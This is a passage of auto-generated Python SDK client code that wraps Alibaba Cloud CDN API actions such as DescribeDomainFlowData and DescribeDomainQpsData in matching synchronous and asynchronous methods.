cdn_20141111_models.DescribeDomainFlowDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_flow_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFlowDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_flow_data(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_flow_data_with_options(request, runtime)
async def describe_domain_flow_data_async(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_flow_data_with_options_async(request, runtime)
def describe_domain_hit_rate_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHitRateDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_hit_rate_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHitRateDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_hit_rate_data(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_hit_rate_data_with_options(request, runtime)
async def describe_domain_hit_rate_data_async(
self,
request: cdn_20141111_models.DescribeDomainHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_hit_rate_data_with_options_async(request, runtime)
def describe_domain_http_code_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHttpCodeData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHttpCodeDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_http_code_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainHttpCodeData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainHttpCodeDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_http_code_data(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_http_code_data_with_options(request, runtime)
async def describe_domain_http_code_data_async(
self,
request: cdn_20141111_models.DescribeDomainHttpCodeDataRequest,
) -> cdn_20141111_models.DescribeDomainHttpCodeDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_http_code_data_with_options_async(request, runtime)
def describe_domain_ispdata_with_options(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainISPData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainISPDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_ispdata_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainISPData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainISPDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_ispdata(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_ispdata_with_options(request, runtime)
async def describe_domain_ispdata_async(
self,
request: cdn_20141111_models.DescribeDomainISPDataRequest,
) -> cdn_20141111_models.DescribeDomainISPDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_ispdata_with_options_async(request, runtime)
def describe_domain_qps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainQpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainQpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_qps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainQpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainQpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_qps_data(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_qps_data_with_options(request, runtime)
async def describe_domain_qps_data_async(
self,
request: cdn_20141111_models.DescribeDomainQpsDataRequest,
) -> cdn_20141111_models.DescribeDomainQpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_qps_data_with_options_async(request, runtime)
def describe_domain_region_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainRegionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainRegionDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_region_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainRegionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainRegionDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_region_data(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_region_data_with_options(request, runtime)
async def describe_domain_region_data_async(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_region_data_with_options_async(request, runtime)
def describe_domain_req_hit_rate_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainReqHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainReqHitRateDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_req_hit_rate_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainReqHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainReqHitRateDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_req_hit_rate_data(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_req_hit_rate_data_with_options(request, runtime)
async def describe_domain_req_hit_rate_data_async(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_req_hit_rate_data_with_options_async(request, runtime)
def describe_domain_src_bps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcBpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_src_bps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcBpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_src_bps_data(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_src_bps_data_with_options(request, runtime)
async def describe_domain_src_bps_data_async(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_src_bps_data_with_options_async(request, runtime)
def describe_domain_src_flow_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcFlowDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_src_flow_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcFlowDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_src_flow_data(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_src_flow_data_with_options(request, runtime)
async def describe_domain_src_flow_data_async(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_src_flow_data_with_options_async(request, runtime)
def describe_domain_uv_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainUvData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainUvDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_uv_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainUvData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainUvDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_uv_data(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_uv_data_with_options(request, runtime)
async def describe_domain_uv_data_async(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_uv_data_with_options_async(request, runtime)
def describe_domains_by_source_with_options(
self,
request: cdn_20141111_models.DescribeDomainsBySourceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainsBySource',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainsBySourceResponse(),
self.call_api(params, req, runtime)
)
async def describe_domains_by_source_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainsBySourceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainsBySource',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainsBySourceResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domains_by_source(
self,
request: cdn_20141111_models.DescribeDomainsBySourceRequest,
) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domains_by_source_with_options(request, runtime)
async def describe_domains_by_source_async(
self,
request: cdn_20141111_models.DescribeDomainsBySourceRequest,
) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domains_by_source_with_options_async(request, runtime)
def describe_domains_usage_by_day_with_options(
self,
request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainsUsageByDay',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainsUsageByDayResponse(),
self.call_api(params, req, runtime)
)
async def describe_domains_usage_by_day_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainsUsageByDay',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainsUsageByDayResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domains_usage_by_day(
self,
request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
runtime = util_models.RuntimeOptions()
